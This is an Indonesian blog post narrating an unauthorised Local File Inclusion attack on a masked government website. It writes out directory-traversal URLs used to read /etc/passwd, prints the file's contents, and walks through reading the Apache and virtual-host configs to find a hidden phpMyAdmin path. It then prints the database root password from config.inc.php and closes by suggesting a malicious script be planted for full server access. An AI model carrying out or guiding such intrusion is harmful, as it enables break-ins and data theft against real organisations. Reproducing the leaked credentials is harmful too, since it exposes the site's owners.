Kamis, 21 Juni 2012

Bug Local Pada file Go.id


Saya akan mempergunakan bug sederhana pada situs 
.gov, Local File Inclusion,
kalo saya bilang mungkin eksekusinya paling hanya
 beberapa menit saja :D  Tapi
sekali lagi yang saya titik beratkan disini adalah 
pola berfikir kritisnya :) 

Waktu itu saya sedang browsing mencari satu artikel 
pada salah satu situs
pemerintah www.somename.go.id nah artikel yang saya 
cari ternyata bisa
didownload berbentuk pdf di url ini

- http://www.somename.go.id/portalbaru/portal/konten.php?
nama=Buku&op=index_buku&mn=6&smn=f

disitu saya liat url untuk mendownloadnya adalah

- http://www.somename.go.id/portalbaru/portal/konten.php?
nama=Buku&op=dl_buku&namafile=WDR_2008_eng_web.pdf

Pemikiran iseng mulai muncul, bagaimana 
jika namafile=WDR_2008_eng_web.pdf saya
ganti menjadi sesuatu.

- http://www.somename.go.id/portalbaru/portal/konten.php?
nama=Buku&op=dl_buku&namafile=blablu.pdf

nah WDR_2008_eng_web.pdf saya ubah menjadi blablu.pdf, 
ternyata aplikasi web
tadi memperbolehkan saya untuk mendownload 
blablu.pdf seolah2 file tersebut
ada, lalu saya ingin mencoba memasukkan path system

- http://www.somename.go.id/portalbaru/portal/konten.php?
nama=Buku&op=dl_buku&namafile=../../../etc/passwd

ternyata dia mendownload file juga, tapi isinya kosong,
 saya asumsikan bahwa
aplikasi diberikan permission yang cukup tinggi untuk 
mengakses file2 sensitif
pada server, saya trial and error aja jika begitu,
 sehingga mencapai url

- http://www.somename.go.id/portalbaru/portal/konten.php?
nama=Buku&op=dl_buku&namafile=
../../../../../../../../../../../etc/passwd

nah disini akhirnya file passwd terdownload dengan sempurna

root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:
/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:
/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var
/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:
/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:
/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:
/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:
/nonexistent:/usr/sbin/nologin
aman:*:1001:1001:User &:/home/aman:/bin/sh
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin

ya sudah, sampe di sini saya tidak akan memberikan 
URL lanjutannya, saya hanya
akan memberikan pola berpikir iseng saya

- step berikutnya saya berfikir, saya harus 
  mencari dimana letak file2 sensitif
  yang bermanfaat tentunya, karena posisi saya 
  sedang berada di satu warnet
  (anggaplah begitu) yang tidak memungkinkan 
  saya menjalankan tools, scanner,
  atau apalah yang semacamnya

- yang saya fikir pertama tentunya dimana 
  letak konfigurasi webserver
- saya harus mengetahui versi dari web server, daemon web server, serta
  operating sistem yang digunakan
- banyak situs di web yang bisa digunakan untuk 
  mencari informasi ini, saya
  dapatkan informasi bahwa OS nya adalah FreeBSD dengan Apache 2.2 sebagai
  webserver
- Lalu saya googling dengen k/w "httpd.conf in
  freebsd apache 2.2" muncullah
  hasil /usr/local/etc/apache22/httpd.conf
- Kemudian saya download httpd.conf dengan 
  menggunakan metoda di atas, muncul
  hasil file configurasi, disana saya garis
 bawahi ada satu baris informasi penting

# Virtual hosts
Include etc/apache22/extra/httpd-vhosts.conf

- Saya lanjutkan pencarian ke /usr/local/etc/apache22/extra/httpd-vhosts.conf

pada file tersebut saya melihat ada baris

<VirtualHost 192.xxx.1.xxx:80>
# <VirtualHost 222.xxx.11.xxx:80>
 ServerAdmin amanbudi@somename.go.id
 # DocumentRoot "/usr/local/www/apache22/data/
   web-somename__upload@07032009/portal"
   DocumentRoot "/usr/local/www/apache22/data/portal2"
 ServerName www.somename.go.id

        Alias /db4dm1n /usr/local/www/apache22/phpMyAdmin
        <Directory /usr/local/www/apache22/phpMyAdmin>
                 AllowOverride All
        </Directory>

- nah berarti disitulah letak phpmyadminnya, 
   beserta url untuk mengaksesnya
  lalu bagaimana dengan login dan passwordnya?  
   Phpmyadmin bukanlah suatu
  aplikasi yang aneh, sebagian besar orang 
  rata2 pernah menggunakannya secara
  umum settingan default konfigurasi ada di
 /phpmyadmin direktori/config.inc.php

- Lalu saya lanjutkan ke 
  /usr/local/www/apache22/phpMyAdmin/config.inc.php

dalam file tersebut ada informasi
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'sf7100sy';

- voila, anda dapat masuk ke dalam mysqladmin, menyelipkan script jahat untuk
  mendapatkan full akses dari server tersebut

Tidak ada komentar:

Posting Komentar

Open Panel

Blogroll